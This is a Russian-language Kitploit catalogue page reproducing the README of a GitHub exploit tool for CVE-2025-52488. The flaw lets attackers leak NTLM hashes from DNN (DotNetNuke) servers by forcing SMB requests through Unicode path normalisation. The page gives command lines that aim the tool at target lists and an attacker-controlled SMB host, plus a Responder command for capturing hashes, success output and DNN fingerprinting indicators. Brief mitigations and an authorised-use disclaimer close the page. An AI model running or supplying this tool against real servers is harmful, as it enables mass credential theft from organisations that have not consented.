Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-52488 — Эта эксплойт нацелен на уязвимость в DNN (ранее DotNetNuke) версий с 6.0.0 до 10.0.1, которая позволяет злоумышленникам раскрывать NTLM-хэши через атаки нормализации путей в Unicode. | Kitploit
Инструменты/GitHubGitHub/sh4den/cve-2025-52488
РазведкаАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информации
GitHubsh4den/cve-2025-52488

CVE-2025-52488

Эта эксплойт нацелен на уязвимость в DNN (ранее DotNetNuke) версий с 6.0.0 до 10.0.1, которая позволяет злоумышленникам раскрывать NTLM-хэши через атаки нормализации путей в Unicode.

Репозиторий
212 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт раскрытия NTLM-хэшей через нормализацию путей Unicode в DNN (CVE-2025-52488)

Обзор

Этот эксплойт нацелен на уязвимость в DNN (ранее DotNetNuke) версий от 6.0.0 до 10.0.1, которая позволяет злоумышленникам раскрывать NTLM-хэши через атаки нормализации путей Unicode.

Детали уязвимости

  • CVE ID: CVE-2025-52488
  • Серьёзность: Высокая (CVSS 8.6)
  • Затронутые версии: с 6.0.0 до версий до 10.0.1
  • Вектор атаки: Сеть
  • Аутентификация: Не требуется

Как это работает

Эксплойт использует особенности Windows/.NET и нормализацию Unicode, чтобы заставить целевой сервер DNN отправлять SMB-запросы на сервер, контролируемый злоумышленником, что потенциально приводит к раскрытию NTLM-хэшей в процессе аутентификации.

Предварительные требования

  1. Python 3.7+
  2. Необходимые пакеты (установите с помощью pip install -r requirements.txt)
  3. SMB-сервер для захвата NTLM-хэшей (например, Responder, Burp Collaborator)

Использование

Базовое использование

root@kitploit:~
python main.py targets.txt attacker.example.com

С пользовательскими параметрами

root@kitploit:~
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15

Аргументы

  • targets: Файл со списком хостов DNN (по одному на строку)
  • smb_server: Имя хоста или IP SMB-сервера для захвата NTLM-хэшей
  • -t, --threads: Количество параллельных потоков (по умолчанию: 10)
  • --timeout: Тайм-аут запроса в секундах (по умолчанию: 10)

Формат файла целей

Создайте текстовый файл с URL целей, по одному на строку:

root@kitploit:~
http://target1.example.com
https://target2.example.com:8080
target3.example.com

Настройка SMB-сервера

Вы можете использовать такие инструменты, как Responder, для захвата NTLM-хэшей:

root@kitploit:~
responder -I eth0 -wrf

Или используйте Burp Collaborator для внеполосного обнаружения.

Пример вывода

root@kitploit:~
[2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets
[2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts

Индикаторы обнаружения

Эксплойт ищет следующие индикаторы DNN:

  • кука dnn_IsMobile
  • dotnetnuke в ответе
  • dnnconnect в ответе
  • DNN Platform в ответе

Меры по смягчению

  • Обновите DNN до версии 10.0.1 или новее
  • Внедрите сетевые средства контроля для предотвращения SMB-запросов к внешним серверам
  • Отслеживайте подозрительные попытки загрузки файлов

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования безопасности. Используйте ответственно и только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение.

Ссылки

  • CVE-2025-52488
  • Исследование Assetnote
Скачать инструмент